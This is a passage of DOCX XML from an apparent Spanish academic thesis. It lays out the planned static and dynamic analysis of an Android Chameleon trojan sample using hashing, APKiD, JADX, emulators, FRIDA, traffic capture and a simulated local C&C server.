      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="4CAB91F5" w14:textId="77777777" w:rsidR="00987EE3" w:rsidRDefault="00987EE3" w:rsidP="00987EE3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58287BCA" w14:textId="080492C6" w:rsidR="00741558" w:rsidRDefault="00741558" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A continuación, se detalla el proceso que se ha seguido en las fases de análisis del malware. En primer lugar, se llevará a cabo una identificación de la muestra de la familia Chameleon elegida junto con un análisis automático de esta. Posteriormente se continuará con las dos fases de análisis, que como se ha mencionado previamente, se llevan a cabo de manera </w:t>
      </w:r>
      <w:r w:rsidR="002428E9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>simultánea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para tratar de extrapolar resultados obtenidos y hacer que los datos obtenidos en una fase sirvan para progresar en la otra y viceversa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38272DB8" w14:textId="77777777" w:rsidR="00926F1A" w:rsidRDefault="00926F1A" w:rsidP="00C06F53">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717F56A6" w14:textId="2028BA66" w:rsidR="00926F1A" w:rsidRPr="004246DC" w:rsidRDefault="00926F1A" w:rsidP="00926F1A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc170500169"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>3.2.1   Identificación de muestra</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="34F6C87D" w14:textId="77777777" w:rsidR="00F84922" w:rsidRDefault="00F84922" w:rsidP="00C06F53">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="587CA4CB" w14:textId="40CAF323" w:rsidR="00250A0D" w:rsidRDefault="00250A0D" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se realizará una obtención de valor hash con la función SHA-256. De esta manera, se obtendrá un identificador único para la muestra. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20722E5E" w14:textId="47209627" w:rsidR="00250A0D" w:rsidRDefault="00250A0D" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Además de este identificador, se hará un escaneo automatizado utilizando la herramienta </w:t>
      </w:r>
      <w:r w:rsidR="002715C3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>APKiD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. El propósito es observar qué tipo de protecciones puede tener el malware de cara al análisis. Si se han utilizado herramientas conocidas y populares para el packing o la ofuscación del troyano, estas serán detectadas, y se podrá proceder a investigar sobre procesos específicos para intentar revertir estas medidas anti-análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041128A7" w14:textId="6273ED0E" w:rsidR="00631D5B" w:rsidRDefault="00631D5B" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En resumen, las subtareas asociadas con esta primera fase de la solución son las siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB8DB8D" w14:textId="164BA473" w:rsidR="00631D5B" w:rsidRDefault="00631D5B" w:rsidP="00631D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Obtención de identificador hash único</w:t>
      </w:r>
      <w:r w:rsidR="009C6A73">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C54013E" w14:textId="4E5C8B6F" w:rsidR="00631D5B" w:rsidRDefault="00631D5B" w:rsidP="00631D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Identificación automática de posibles métodos anti</w:t>
      </w:r>
      <w:r w:rsidR="0014406B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">análisis con </w:t>
      </w:r>
      <w:r w:rsidR="00E614B5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>APKiD</w:t>
      </w:r>
      <w:r w:rsidR="009C6A73">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCFE025" w14:textId="77777777" w:rsidR="00830F49" w:rsidRDefault="00830F49" w:rsidP="00C06F53">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F4C36A0" w14:textId="77777777" w:rsidR="00830F49" w:rsidRDefault="00830F49" w:rsidP="00830F49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc170500170"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>3.2.2   Análisis estático</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="03DDC040" w14:textId="77777777" w:rsidR="00650CE8" w:rsidRPr="00650CE8" w:rsidRDefault="00650CE8" w:rsidP="00650CE8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70479043" w14:textId="3191F64B" w:rsidR="00830F49" w:rsidRDefault="00830F49" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En esta fase se llevará un análisis del código de la muestra APK sin realizar su ejecución. En primer lugar, se procederá a desempaquetar el fichero de la muestra y hacer una enumeración de sus contenidos más importantes. Algunos de los archivos adicionales, como puede ser el manifiesto de Android o los recursos, pueden ser de gran ayuda a la hora de identificar posibles comportamientos del malware previa a su ejecución, además de poder arrojar más detalles sobre posibles métodos de ofuscación y anti-análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125DDDB3" w14:textId="0004A76D" w:rsidR="009E4603" w:rsidRDefault="00E314E4" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En la fase de análisis puro se utilizará JADX para obtener código Java a partir del fichero DEX de la aplicación, ya que este es más legible y fácil de comprender que el bytecode DEX de ART. </w:t>
      </w:r>
      <w:r w:rsidR="009E4603">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vez obtenido el código Java, se procederá a analizar sus clases e intentar comprender comportamientos y funciones que es probable sean efectuadas por el </w:t>
      </w:r>
      <w:r w:rsidR="009E4603">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>malware en el momento de su ejecución. En el caso de contar con código ofuscado, se procederá a su renombrado e inclusión de comentarios para facilitar la tarea de comprensión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2748552E" w14:textId="58AED161" w:rsidR="00AB48CC" w:rsidRDefault="00AB48CC" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Por lo tanto, las actividades previstas inicialmente en la solución del análisis estático son las siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288E1B0C" w14:textId="6BED643A" w:rsidR="00AB48CC" w:rsidRDefault="00AB48CC" w:rsidP="00AB48CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Desempaquetado del archivo APK de la muestra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45484DAE" w14:textId="66F53B19" w:rsidR="00AB48CC" w:rsidRDefault="00AB48CC" w:rsidP="00AB48CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Enumeración de los archivos principales encontrados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F556F8" w14:textId="06557584" w:rsidR="00AB48CC" w:rsidRDefault="00AB48CC" w:rsidP="00AB48CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Análisis de los archivos importantes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E7F6A9" w14:textId="3B002565" w:rsidR="00AB48CC" w:rsidRDefault="00AB48CC" w:rsidP="00AB48CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Manifiesto XML Android y permisos asociados</w:t>
      </w:r>
      <w:r w:rsidR="0014406B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EFEAD1" w14:textId="0FA77939" w:rsidR="00AB48CC" w:rsidRDefault="00AB48CC" w:rsidP="00AB48CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Recursos utilizados por la aplicación</w:t>
      </w:r>
      <w:r w:rsidR="0014406B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510B7DD4" w14:textId="26E237E8" w:rsidR="000B22C3" w:rsidRDefault="000B22C3" w:rsidP="00AB48CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Archivos adicionales que pueden ser de utilidad</w:t>
      </w:r>
      <w:r w:rsidR="0014406B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54571FCE" w14:textId="4F877B99" w:rsidR="000B22C3" w:rsidRDefault="000B22C3" w:rsidP="000B22C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Conversión de código DEX a Java mediante JADX</w:t>
      </w:r>
      <w:r w:rsidR="0014406B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3967B685" w14:textId="1B9D7EE4" w:rsidR="000B22C3" w:rsidRDefault="000B22C3" w:rsidP="000B22C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Análisis del código Java encontrado</w:t>
      </w:r>
      <w:r w:rsidR="0014406B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416E8AF2" w14:textId="0419B04C" w:rsidR="000B22C3" w:rsidRDefault="000B22C3" w:rsidP="000B22C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Anotación y renombrado en caso de ofuscación</w:t>
      </w:r>
      <w:r w:rsidR="0014406B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6157AC82" w14:textId="77777777" w:rsidR="00BC0532" w:rsidRDefault="00BC0532" w:rsidP="00C06F53">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C9ECC77" w14:textId="7FAAEA4B" w:rsidR="00C84CF4" w:rsidRDefault="00C84CF4" w:rsidP="00C84CF4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc170500171"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.3   Análisis </w:t>
      </w:r>
      <w:r w:rsidR="00CD27F4">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dinámico</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="0073781C" w14:textId="77777777" w:rsidR="00267985" w:rsidRPr="00267985" w:rsidRDefault="00267985" w:rsidP="00267985">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C8067CA" w14:textId="1572D407" w:rsidR="00BC0532" w:rsidRDefault="00BC0532" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Paralelamente al análisis estático, se instalará y ejecutará la muestra del troyano en los dispositivos Android emulados que proporcionan tanto Android Studio como Genymotion en el caso de necesitarse acceso de superusuario o la instrumentación mediante FRIDA para alterar el funcionamiento. Se recabará toda la información pertinente del proceso de instalación, como la petición de permisos o la generación de notificaciones o alertas, así como el comportamiento en términos generales del malware. Posteriormente, se analizará el comportamiento visible de la aplicación instalada en el dispositivo emulado. Simultáneamente, se llevará a cabo un análisis del tráfico generado y recibido por parte del dispositivo, tratando de interceptar y diseccionar los paquetes que hayan sido enviados por el malware en el caso de comunicarse con servidores C&amp;C externos. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65945707" w14:textId="312365F9" w:rsidR="00EC1494" w:rsidRDefault="006B26EE" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Un punto importante que remarcar es que e</w:t>
      </w:r>
      <w:r w:rsidR="00CC056D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>n el supuesto</w:t>
      </w:r>
      <w:r w:rsidR="00EC1494">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> caso de que los servidores remotos no se encuentren disponibles, lo cual es un hecho posible ya que el ciclo de vida de este tipo de malware con servidores C&amp;C es relativamente corto [X]</w:t>
      </w:r>
      <w:r w:rsidR="00CC056D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, se puede intentar crear un servidor local que simule ser el servidor remoto. Para ello habría que crear una infraestructura que respondiese a las peticiones del dispositivo infectado y enviase respuestas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de acuerdo con</w:t>
      </w:r>
      <w:r w:rsidR="00CC056D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> los protocolos establecidos. Además, se deberían de redirigir las peticiones del malware al nuevo servidor local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E1E721" w14:textId="34B38E92" w:rsidR="006B26EE" w:rsidRDefault="006B26EE" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Esta solución de servidor local podría ser utilizada no solamente en el caso de no estar disponibles los servidores remotos de los atacantes, sino también en el caso de querer observar algún comportamiento determinado del malware identificado en el análisis estático, pero no desencadenado por el servidor remoto. Desde el servidor local se podría controlar con mayor granularidad el comportamiento del malware, permitiendo la exploración de los caminos de ejecución encontrados sin dependencias externas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DD443C" w14:textId="4EC9FFF8" w:rsidR="00530BC5" w:rsidRDefault="00530BC5" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Finalmente, las subtareas que pertenecen a esta fase dinámica de la solución son las siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E8D6A2" w14:textId="7AE492B9" w:rsidR="00530BC5" w:rsidRPr="00530BC5" w:rsidRDefault="00530BC5" w:rsidP="00530BC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Instalación de la muestra en dispositivos emulados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9EBBEA" w14:textId="209577ED" w:rsidR="00530BC5" w:rsidRPr="00530BC5" w:rsidRDefault="00530BC5" w:rsidP="00530BC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejecución de la muestra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8CAEF4" w14:textId="78313D27" w:rsidR="00530BC5" w:rsidRPr="00530BC5" w:rsidRDefault="00530BC5" w:rsidP="00530BC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Monitorización del comportamiento visible</w:t>
      </w:r>
      <w:r w:rsidR="00B451E1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> provocado por la muestra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422D79D4" w14:textId="0ED74E95" w:rsidR="008B505C" w:rsidRDefault="008B505C" w:rsidP="00B451E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Captura y disección de tráfico de red generado por la muestra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75818C63" w14:textId="1FB02E6A" w:rsidR="00B451E1" w:rsidRDefault="00B451E1" w:rsidP="00B451E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B451E1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Intento de creación de servidor local de simulación C&amp;C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A66D869" w14:textId="77777777" w:rsidR="00B451E1" w:rsidRDefault="00B451E1" w:rsidP="00B451E1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19E265FB" w14:textId="6511F833" w:rsidR="00E95A92" w:rsidRPr="00E019B5" w:rsidRDefault="00B451E1" w:rsidP="00E019B5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es importante recalcar que, debido a la naturaleza de gran parte de las  tareas, un componente importante es el de la propia investigación. Además, no se conocen previamente las posibles medidas que pueda presentar el malware para impedir su análisis. Por lo tanto, parte de la solución propuesta podría verse modificada a la hora de su realización si fuese necesario debido a elementos que forzasen una alteración del proceso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ADB5E9" w14:textId="124441DB" w:rsidR="00E95A92" w:rsidRPr="00A83021" w:rsidRDefault="00E95A92" w:rsidP="008575F5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E288149" w14:textId="2E49D319" w:rsidR="00E95A92" w:rsidRDefault="008575F5" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
